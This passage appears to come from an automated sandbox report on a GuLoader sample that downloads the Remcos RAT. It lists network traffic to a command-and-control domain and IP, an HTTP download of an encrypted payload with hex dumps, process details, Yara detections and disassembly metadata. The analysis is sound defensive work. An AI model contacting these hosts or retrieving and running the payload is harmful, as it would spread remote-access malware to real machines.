Aug 2, 2021 21:24:04.902326107 CEST	49767	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 21:24:04.975311041 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:24:14.912899017 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:24:14.915688992 CEST	49767	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 21:24:14.990694046 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:24:24.928356886 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:24:24.932533979 CEST	49767	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 21:24:25.007788897 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:24:34.943857908 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:24:34.947792053 CEST	49767	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 21:24:35.021802902 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:24:44.959290028 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:24:44.966340065 CEST	49767	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 21:24:45.036993027 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:24:54.974473953 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:24:54.977452993 CEST	49767	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 21:24:55.052544117 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:25:04.989861012 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:25:04.995665073 CEST	49767	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 21:25:05.068243980 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:25:15.005501986 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:25:15.008903980 CEST	49767	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 21:25:15.083307028 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:25:25.020896912 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:25:25.027075052 CEST	49767	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 21:25:25.098917007 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:25:35.039349079 CEST	39200	49767	194.5.97.128	192.168.2.4
Aug 2, 2021 21:25:35.041384935 CEST	49767	39200	192.168.2.4	194.5.97.128
Aug 2, 2021 21:25:35.114253044 CEST	39200	49767	194.5.97.128	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 2, 2021 21:17:01.393048048 CEST	49714	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:01.420507908 CEST	53	49714	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:02.722836018 CEST	58028	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:02.750277042 CEST	53	58028	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:04.696264982 CEST	53097	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:04.720990896 CEST	53	53097	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:05.761957884 CEST	49257	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:05.789669991 CEST	53	49257	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:06.840415955 CEST	62389	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:06.866498947 CEST	53	62389	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:08.514224052 CEST	49910	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:08.546753883 CEST	53	49910	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:09.595941067 CEST	55854	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:09.623547077 CEST	53	55854	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:10.547267914 CEST	64549	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:10.574770927 CEST	53	64549	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:11.647775888 CEST	63153	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:11.675528049 CEST	53	63153	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:12.845449924 CEST	52991	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:12.878277063 CEST	53	52991	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:13.870208979 CEST	53700	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:13.904135942 CEST	53	53700	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:14.987005949 CEST	51726	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:15.019890070 CEST	53	51726	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:16.020144939 CEST	56794	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:16.047681093 CEST	53	56794	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:17.078398943 CEST	56534	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:17.111186981 CEST	53	56534	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:18.109400988 CEST	56627	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:18.141968012 CEST	53	56627	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:19.095261097 CEST	56621	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:19.120047092 CEST	53	56621	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:20.116214991 CEST	63116	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:20.151633024 CEST	53	63116	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:21.170927048 CEST	64078	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:21.206410885 CEST	53	64078	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:31.180922031 CEST	64801	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:31.222162962 CEST	53	64801	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:45.923132896 CEST	61721	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:45.982989073 CEST	53	61721	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:46.522591114 CEST	51255	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:46.555643082 CEST	53	51255	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:47.145872116 CEST	61522	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:47.181860924 CEST	53	61522	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:47.704446077 CEST	52337	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:47.746491909 CEST	53	52337	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:48.197175026 CEST	55046	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:48.231225967 CEST	53	55046	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:48.602571011 CEST	49612	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:48.630182981 CEST	53	49612	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:48.787736893 CEST	49285	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:48.829253912 CEST	53	49285	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:49.046789885 CEST	50601	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:49.079457045 CEST	53	50601	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:49.693171978 CEST	60875	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:49.725912094 CEST	53	60875	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:50.854691029 CEST	56448	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:50.887387037 CEST	53	56448	8.8.8.8	192.168.2.4
Aug 2, 2021 21:17:51.457587004 CEST	59172	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:17:51.492850065 CEST	53	59172	8.8.8.8	192.168.2.4
Aug 2, 2021 21:18:06.299632072 CEST	62420	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:18:06.332312107 CEST	53	62420	8.8.8.8	192.168.2.4
Aug 2, 2021 21:18:06.416522026 CEST	60579	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:18:06.462497950 CEST	53	60579	8.8.8.8	192.168.2.4
Aug 2, 2021 21:18:12.731527090 CEST	50183	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:18:12.772198915 CEST	53	50183	8.8.8.8	192.168.2.4
Aug 2, 2021 21:18:41.353856087 CEST	61531	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:18:41.389388084 CEST	53	61531	8.8.8.8	192.168.2.4
Aug 2, 2021 21:18:43.933024883 CEST	49228	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:18:43.965635061 CEST	53	49228	8.8.8.8	192.168.2.4
Aug 2, 2021 21:20:14.137607098 CEST	59794	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:20:14.180700064 CEST	53	59794	8.8.8.8	192.168.2.4
Aug 2, 2021 21:21:56.173140049 CEST	55916	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:21:56.208565950 CEST	53	55916	8.8.8.8	192.168.2.4
Aug 2, 2021 21:21:56.346127033 CEST	52752	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:21:56.371498108 CEST	53	52752	8.8.8.8	192.168.2.4
Aug 2, 2021 21:21:56.724428892 CEST	60542	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:21:56.757277012 CEST	53	60542	8.8.8.8	192.168.2.4
Aug 2, 2021 21:21:59.849406958 CEST	60689	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:21:59.884716034 CEST	53	60689	8.8.8.8	192.168.2.4
Aug 2, 2021 21:22:02.763622046 CEST	64206	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:22:02.810947895 CEST	53	64206	8.8.8.8	192.168.2.4
Aug 2, 2021 21:22:03.106690884 CEST	50904	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:22:03.159214020 CEST	53	50904	8.8.8.8	192.168.2.4
Aug 2, 2021 21:24:13.843344927 CEST	57525	53	192.168.2.4	8.8.8.8
Aug 2, 2021 21:24:13.894480944 CEST	53	57525	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 2, 2021 21:20:14.137607098 CEST	192.168.2.4	8.8.8.8	0xacf	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 2, 2021 21:20:14.180700064 CEST	8.8.8.8	192.168.2.4	0xacf	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 2, 2021 21:21:56.208565950 CEST	8.8.8.8	192.168.2.4	0xdf4d	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.akadns.net		CNAME (Canonical name)	IN (0x0001)

HTTP Request Dependency Graph

101.99.94.119

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49766	101.99.94.119	80	C:\Users\user\Desktop\LzbZ4T1iV8.exe

Timestamp	kBytes transferred	Direction	Data
Aug 2, 2021 21:20:11.882945061 CEST	6581	OUT	GET /WEALTH_PRUuqVZw139.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: 101.99.94.119 Cache-Control: no-cache
Aug 2, 2021 21:20:11.932694912 CEST	6582	IN	HTTP/1.1 200 OK Date: Mon, 02 Aug 2021 11:20:11 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29 Last-Modified: Sun, 01 Aug 2021 22:14:12 GMT ETag: "72840-5c886c5bd2c84" Accept-Ranges: bytes Content-Length: 469056 Content-Type: application/octet-stream Data Raw: 02 da 3f 3b 14 7d 1a 6a 97 49 3f 94 5c 82 37 c8 0c ca ec 44 1c 6d c0 32 59 f9 cf d2 b0 1a e7 13 99 e0 d4 67 ec d8 64 6e 95 58 ec b1 4f 94 7f 92 37 39 35 25 0e 6c f3 89 78 b7 14 89 1a b4 26 f2 11 bc 3c b1 1c 0b fb d6 41 4d 17 b6 90 e4 e1 56 be d4 42 8e 30 56 42 72 02 40 cf 5a 21 29 62 b6 a4 bb 97 62 c7 e2 1d 15 12 0a 25 a3 bb 05 00 9a 03 47 1d ba da 59 7d 50 7d 8e 32 9f bd 1b 63 b0 ea 7e de 40 f0 aa 58 0e 19 69 40 f1 d1 6b f1 62 d6 9c 56 99 d3 55 3a 4c c8 f3 2a 1b 7f 98 48 43 5b 6b 10 cc 6e ca 2c 4f d1 bc 05 59 7c a8 bd 1b e3 26 7b 5f 90 54 72 2d 60 23 c9 eb 7e 5d ec e2 0a 13 8d ba 86 2d 25 4e 20 56 e0 c4 56 b4 da 8c f9 40 35 ce ca 47 61 c1 d5 42 39 36 83 4b 05 13 8e 82 3a 7f 1a 70 78 d3 98 05 7d 70 85 8a 7a b4 55 f9 32 c4 64 02 aa 76 81 23 0d 67 b4 0c 86 01 3c 66 fe 8e 3d 81 d4 a9 fd 53 2d 87 b2 0a 8c 47 cb 99 07 35 0a ea 05 95 85 9a ea 9e 1c b4 42 7b 37 c3 bf 5b d5 08 31 4c 06 8c ae 2a dc 74 43 76 6b 1a 79 74 62 a4 ec 7a e4 b3 33 61 bb 8c f9 8d 24 71 d9 a7 31 0b f7 dd 8d a2 30 60 0f 5d 6b ca 63 ff f3 ad e7 ae 9c 70 5d ab fb cf ab d5 2a 9c 0b c8 8a 06 7a 9e 24 c7 88 e1 fc 5f 55 5d a2 fe e4 58 1e af 6c 38 09 9d 79 ed 0d 1e d1 9b 13 ef bb dd e2 65 05 71 fa 7e 26 bb f5 c9 72 29 42 3c 09 d8 c6 58 89 d2 04 93 17 fc f9 4a ff 0c 29 bd d9 81 ba cb e4 1b 2c 52 78 a4 d9 42 8a 61 95 7c 3e 9a 70 61 f5 c7 73 cf af 4a 80 27 ac 59 a8 a5 a9 49 8b 4d 5f 3c 72 be c5 73 21 12 da 76 7f ba 44 c5 a7 66 6a 8f 02 0d 2c 51 87 6a c1 50 3a 55 43 c6 41 a6 d1 bb 6d db 6f 22 5f 49 7b bc 5d 82 66 82 4b a4 3c d9 82 27 47 0b f0 a6 2a 48 ec 52 1e 40 e4 cc 10 e5 b4 02 68 d3 1c 3b 3c 99 33 d9 13 b9 61 55 a3 8e da ce 48 88 c3 28 d8 13 34 45 1f df b3 20 66 a5 15 3a 2d 26 dc 96 c9 67 30 5c ca 63 b9 34 86 eb 7a fc ff c3 26 06 89 06 ca a1 12 4b 9d f9 57 a7 54 49 70 0a 52 77 83 b6 e9 02 f2 6c 48 f9 74 79 d9 82 16 96 89 9a 7a de b4 90 0f f6 16 6b 07 64 5c 83 16 8f 9d 35 d2 84 8c 59 91 d3 47 b1 2a 4d ad cd 41 07 a6 d3 a3 71 13 43 48 13 55 d1 61 c8 b4 e9 72 ef e4 25 55 23 a3 6c b7 1b 62 c3 ff ed f0 85 26 dc 67 ec 9d b6 82 25 ee ff a9 0b a1 9b 2b e2 53 8e cb 80 d9 08 0e 43 7f ab aa ac e8 48 0c 86 43 08 9d 39 48 04 fc 5a fd cb ff 7f d7 7e 5f cc dd e7 46 9c 10 4c 3d 16 86 e7 3c 91 40 12 5f 01 8e 41 14 23 b5 7b 43 89 4d 4f ad 4f fe 82 56 43 16 6f 60 ec 0e cc 2b 5a f9 2b db 17 89 0a 97 3c 4b 96 7c a4 e1 58 26 05 bd dd b6 55 ab 82 d1 2f 30 a1 29 7c 1d ca aa 24 22 59 fb a1 c2 6e 18 e5 67 5a 05 bf 70 24 a9 54 96 11 ce 4f 01 7c ab 96 38 b4 35 55 08 59 ea ed 23 06 cb 67 22 ff ab ea ab ed 73 ef 40 4f 10 61 66 d5 f0 91 4b 0c 68 4b 13 1b 27 3c 7c 9e cf 12 c2 37 76 5d 5f bc c1 76 8d 4a 87 b9 10 33 69 85 2b e7 99 38 4a d2 a4 a6 09 55 d3 c9 70 5e d8 c0 6d ff 3c fb 56 07 b6 e7 fb 66 8f fb f9 d7 f4 a8 fb 01 0b fa 5c db d2 33 8e 37 1f 9e 99 c1 15 13 ea e1 cd e4 0c 5c e6 ac b1 1f 0b fb d6 45 4d 17 b6 6f 1b e1 56 06 d4 42 8e 30 56 42 72 42 40 cf 5a 21 29 62 b6 a4 bb 97 62 c7 e2 1d 15 12 0a 25 a3 bb 05 00 9a 03 47 1d ba da 59 7d 50 7d 8e 32 9f ad 1a 63 b0 e4 61 64 4e f0 1e 51 c3 38 d1 41 bd 1c 4a a5 0a bf ef 76 e9 a1 3a 5d 3e a9 9e 0a 78 1e f6 26 2c 2f 4b 72 a9 4e b8 59 21 f1 d5 6b 79 38 Data Ascii: ?;}jI?\7Dm2YgdnXO795%lx&<AMVB0VBr@Z!)bb%GY}P}2c~@Xi@kbVU:LHC[kn,OY\|&{_Tr-`#~]-%N VV@5GaB96K:px}pzU2dv#g<f=S-G5B{7[1LtCvkytbz3a$q10`]kcp]z$_U]Xl8yeq~&r)B<XJ),RxBa\|>pasJ'YIM_<rs!vDfj,QjP:UCAmo"_I{]fK<'GHR@h;<3aUH(4E f:-&g0\c4z&KWTIpRwlHtyzkd\5YG*MAqCHUar%U#lb&g%+SCHC9HZ~_FL=<@_A#{CMOOVCo`+Z+<K\|X&U/0)\|$"YngZp$TO\|85UY#g"s@OafKhK'<\|7v]_vJ3i+8JUp^m<Vf\37\EMoVB0VBrB@Z!)bb%GY}P}2cadNQ8AJv:]>x&,/KrNY!ky8
Aug 2, 2021 21:20:11.932858944 CEST	6583	IN	Data Raw: e7 ee 3b 8e 49 1f 3a be 59 7f 27 44 23 c9 eb 7e 5d ec e2 a0 90 cf 8a 68 cf 09 2d ce b4 cc a7 b8 56 f6 ef a3 3e e8 ad 36 a5 4d a2 8f 3c e6 55 cc a9 29 70 d4 fc e4 1c ea 92 54 b0 7f 9f d5 aa 8a a8 10 d7 cd d8 d6 a7 88 88 f1 32 11 9f ca dc a4 ec aa Data Ascii: ;I:Y'D#~]h-V>6M<U)pT2;*c/,c8$\TQO~N!2}/BUXM$LtPi097ks{COpR_Y'EGWuYgCiJUSeYc)BeYB`Jd
Aug 2, 2021 21:20:11.932898045 CEST	6585	IN	Data Raw: e1 64 8e 39 e6 62 9a 10 ef 6a ad 25 5c 83 a5 d3 cb ed 3f 06 48 8b a9 0e 63 d6 e8 2a be 23 28 e9 99 ef 6f a0 7b d7 ae 0f 73 21 a5 4e e4 33 43 88 ff 76 d2 da c7 ce 56 7e a9 d3 31 f2 50 80 48 44 d5 db cb 16 f4 47 21 e9 f8 4b cc d6 bc 7d 91 c6 7d 0c Data Ascii: d9bj%\?Hc*#(o{s!N3CvV~1PHDG!K}}/rl]L,EDoWqn.54nReq0Q)/Muly+)M/4F.oUEM)g4 FZ)$3:t'(WTr}\n
Aug 2, 2021 21:20:11.932944059 CEST	6586	IN	Data Raw: f7 e4 8f c3 f3 55 f8 ec 29 fb d9 f8 38 5a ea 7a 8c 4d 80 60 56 2e f6 b3 10 d7 da ce c5 2c 43 08 fb 3a 54 9f a1 e9 50 50 66 d8 af da 5c 10 62 a8 5d 6f 8d 4a ed 00 51 e8 a0 a7 c0 1b 35 12 d5 20 a2 3a 3b 90 7d fb ed 57 04 79 c5 b4 72 50 54 ea 1d 8e Data Ascii: U)8ZzM`V.,C:TPPf\b]oJQ5 :;}WyrPT~;Is5kT4OUnXa14Rf1.G&O]WRh)$sr3; 3PAHJvI6.B!u{~^67P_$I#]*t8HW#
Aug 2, 2021 21:20:11.982657909 CEST	6587	IN	Data Raw: be 7b 98 00 ef 8d 61 c7 4d f6 7f d8 c2 c3 0a 49 79 2e e2 53 0b 00 68 2c 84 08 43 2f 20 65 44 05 4a 0c 86 13 e0 2b 28 08 04 a5 c3 57 7f e7 2b 81 f3 1a c4 5f 2c 16 74 84 af 3b 16 0d 15 b7 5a cd cb a5 51 66 85 17 23 b5 84 75 02 82 b0 9d a7 19 93 56 Data Ascii: {aMIy.Sh,C/ eDJ+(W+_,t;ZQf#uVfj:ZpFK?KcU )\|7d`nnOTi(ev1U#S@zkr*a/It?nYK{T3Aq0Ne\?#:tsp^c
Aug 2, 2021 21:20:11.982708931 CEST	6589	IN	Data Raw: 9d 9c d2 3f 31 18 9c 07 49 ec e3 8e e6 f5 26 e0 74 d3 76 44 be 12 f5 d6 09 e0 b0 2f 62 ee 57 6e 43 c5 b1 72 42 67 ea 1d d0 0f 3c f6 87 f4 96 60 15 12 a6 bf 50 88 46 c0 47 3d 3f 0d cb 5d 6e 3d b1 27 71 d9 2c 31 c8 a2 56 61 f4 bb 91 e7 86 96 35 cc Data Ascii: ?1I&tvD/bWnCrBg<`PFG=?]n='q,1Va51&g%e=1ae*Bk<IAmd8,HFdWT~1%XY{MtRp1aw{??w\|q'@Tt^s!BQ^~g,Q'K.AA-3&_P}
Aug 2, 2021 21:20:11.982744932 CEST	6590	IN	Data Raw: f9 9a d3 34 e6 04 5c b1 64 0a a6 bf ae e2 ee 53 c4 2f b6 96 2f 1a 8f 66 a4 f9 71 be 9f ec 4a 4b 15 61 8c 4c ad 4f 55 b3 d6 fe 34 08 72 9a e9 41 3b 29 d3 a2 14 ff 56 02 6e c3 c0 5d f7 a4 da 36 2f 47 7b 8d dc 54 43 e5 2b d0 cf 4a 25 f9 ab bf a0 32 Data Ascii: 4\dS//fqJKaLOU4rA;)Vn]6/G{TC+J%2`n`N*z]&!RZm?^@jrUEjHq6Ki~vk:-?h=j(:^x0vp?PT:b]HoTNE.c0
Aug 2, 2021 21:20:11.982781887 CEST	6591	IN	Data Raw: f1 7d 95 a1 a5 63 90 ea 78 a6 3d 16 65 19 32 1b b6 16 05 82 b9 3f 2a 9b d8 99 6f 54 ce f4 7c 15 65 f5 30 60 0f 6e b9 88 08 78 7e e5 54 a0 dd ba 9b 39 70 4b f6 16 7f 17 e7 a2 88 f9 ef 92 d9 b3 8b 08 ef b7 aa b8 24 3a e8 0f de a7 6c 6d 82 71 7f 1b Data Ascii: }cx=e2?*oT\|e0`nx~T9pK$:lmqktfS~r{iB</~ttT3RxawUsw:-o#I"r&Q;wpfFPhFn2!YRa&_P7ub.V3w,nub^rE
Aug 2, 2021 21:20:11.982825994 CEST	6593	IN	Data Raw: 6b d2 e7 f9 7a e1 79 75 07 0b 2d db 42 02 16 c2 6a 1c 19 8d 4c 39 28 df fa 36 a0 be de b3 b9 0e 58 11 2a e7 94 63 3e 55 9b 35 13 fc c5 cb 6f 4f 6e d1 f9 9d 4a 8f db 2a 94 e2 55 9d c4 cf 36 52 63 c7 4b 6a 0b 53 04 28 e9 23 53 40 8b 33 a9 26 ef 91 Data Ascii: kzyu-BjL9(6Xc>U5oOnJU6RcKjS(#S@3&az`d/l=q7v]1QT8{j0LXd.?vjrgmvL&3ZLXkM>I?^B0Z!/^H`uRY ugAG{
Aug 2, 2021 21:20:11.982887030 CEST	6594	IN	Data Raw: 45 0c 26 f6 bb 10 bb 99 bd f7 59 7a 5e 2a 17 db e3 5d 3d 50 91 a0 62 83 e0 f2 74 10 4f 8c 39 6d 17 08 94 b3 4b 2a cd 9e d4 e7 a6 38 74 ec ec fe e5 6c ab 06 b6 ea 96 8d 42 0a 36 71 6e 4a 3f cf 88 2f 3b 54 2d fb 10 d6 f0 73 0f f3 87 29 96 1e 12 7e Data Ascii: E&Yz^]=PbtO9mK8tlB6qnJ?/;T-s)~B\9n'0+mV<W:"WI_piY"9b<U}eD\^2'<?7Gf3R=Dq~y471Zg=F5FA`7+vAou
Aug 2, 2021 21:20:11.982945919 CEST	6595	IN	Data Raw: 49 3f 03 1d f1 86 d0 01 e0 ee 06 78 20 cc c1 8c 69 a2 27 53 00 de ad ad e0 c7 0b 06 83 97 02 42 c7 f9 34 64 27 eb 20 64 d5 77 b2 67 d0 d3 13 a6 be 05 af 49 b4 a3 ec 8f 1f aa e9 c3 09 68 21 9d 26 c8 89 5e 98 37 0f 75 c8 46 d7 51 d2 d7 96 38 28 20 Data Ascii: I?x i'SB4d' dwgIh!&^7uFQ8( K?t<I5\0MgA>.F*_HN)qTjqfAD"lnLs8ZBlKtnqmg=.^@unAn\|V;-z

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: LzbZ4T1iV8.exe PID: 7032 Parent PID: 5836

General

Start time:	21:17:06
Start date:	02/08/2021
Path:	C:\Users\user\Desktop\LzbZ4T1iV8.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\LzbZ4T1iV8.exe'
Imagebase:	0x400000
File size:	114688 bytes
MD5 hash:	41E1BC9DE5F3B61639FB88143E933FF8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: LzbZ4T1iV8.exe PID: 1504 Parent PID: 7032

General

Start time:	21:18:52
Start date:	02/08/2021
Path:	C:\Users\user\Desktop\LzbZ4T1iV8.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\LzbZ4T1iV8.exe'
Imagebase:	0x400000
File size:	114688 bytes
MD5 hash:	41E1BC9DE5F3B61639FB88143E933FF8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.1716863368.00000000006E7000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: LzbZ4T1iV8.exe PID: 7032 Parent PID: 5836 LzbZ4T1iV8.exeCOMMON

Executed Functions

Function 020F0BEF, Relevance: 22.4, APIs: 3, Strings: 9, Instructions: 1378COMMON

Download Yara Rule

APIs

Part of subcall function 020F588C: NtAllocateVirtualMemory.NTDLL(-228365FB,000005C4), ref: 020F5AF4

TerminateProcess.KERNELBASE(3915B537,3DE72F93), ref: 020F544F

Strings

:|J, xrefs: 020F1295
}c$, xrefs: 020F1655
32aG, xrefs: 020F4839
*6;R, xrefs: 020F508D
Mb, xrefs: 020F4691
,+Jv, xrefs: 020F13CA
:FKM, xrefs: 020F4EEB
5>\, xrefs: 020F5431
r-<W, xrefs: 020F4E4D

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryProcessTerminateVirtual
String ID: *6;R$,+Jv$32aG$5>\$:FKM$:|J$Mb$r-<W$}c$
API String ID: 2292769835-2297970736
Opcode ID: 2543ce4160739684f0dfdca0db564c9a4f20cc77734d57913462feee6cf05424
Instruction ID: 10531fd5bb9ef408077c0a61e30c10ec15fc1201e9b8fbcb70f5c96be36995ab
Opcode Fuzzy Hash: 2543ce4160739684f0dfdca0db564c9a4f20cc77734d57913462feee6cf05424
Instruction Fuzzy Hash: 5AC21072A443899FDBB49F38CC857EABBA2FF54310F45812DDD899B654D3305A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 020F03CA, Relevance: 13.3, APIs: 1, Strings: 6, Instructions: 1037COMMON

Download Yara Rule

Strings

32aG, xrefs: 020F4839
*6;R, xrefs: 020F508D
Mb, xrefs: 020F4691
(O, xrefs: 020F0965
:FKM, xrefs: 020F4EEB
r-<W, xrefs: 020F4E4D

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: *6;R$32aG$:FKM$Mb$r-<W$(O
API String ID: 2167126740-1531201012
Opcode ID: 2cdc14174bbb31c6b022719b15eebc9d4fcc1ee6c687492b19c626aa519e07ca
Instruction ID: d32475c9ae971c73348d349867c5d99424f1f9b2e1eb602079e956717fba3b56
Opcode Fuzzy Hash: 2cdc14174bbb31c6b022719b15eebc9d4fcc1ee6c687492b19c626aa519e07ca
Instruction Fuzzy Hash: 1D920FB26443499FDBB49F38CC957EABBA2FF58310F45812DDD899B614D3309A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 020F61C5, Relevance: 11.2, APIs: 1, Strings: 5, Instructions: 745COMMON

Download Yara Rule

Strings

32aG, xrefs: 020F4839
*6;R, xrefs: 020F508D
Mb, xrefs: 020F4691
:FKM, xrefs: 020F4EEB
r-<W, xrefs: 020F4E4D

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: *6;R$32aG$:FKM$Mb$r-<W
API String ID: 0-3219171453
Opcode ID: a699f9232bd27910b0501f095a90396e06e6984257e1c5d93ae34fe26dc0f029
Instruction ID: 86205e6829263ab10ea5a268a8e3dc1f3be5f665fa4e5ef14ec2f660f267ac17
Opcode Fuzzy Hash: a699f9232bd27910b0501f095a90396e06e6984257e1c5d93ae34fe26dc0f029
Instruction Fuzzy Hash: 8F62EEB1644349AFDBA8AF34CC857DABBA2FF58300F55812DDD899B614C7309A81CF52

Uniqueness

Uniqueness Score: -1.00%

Function 020F42C4, Relevance: 11.2, APIs: 1, Strings: 5, Instructions: 688nativeCOMMON

Download Yara Rule
